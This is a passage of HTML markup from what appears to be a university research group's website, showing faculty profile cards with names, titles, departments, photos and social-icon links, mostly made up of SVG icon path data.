1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 